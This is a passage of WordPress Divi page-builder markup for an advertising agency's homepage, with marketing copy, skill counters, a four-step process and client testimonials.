src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" 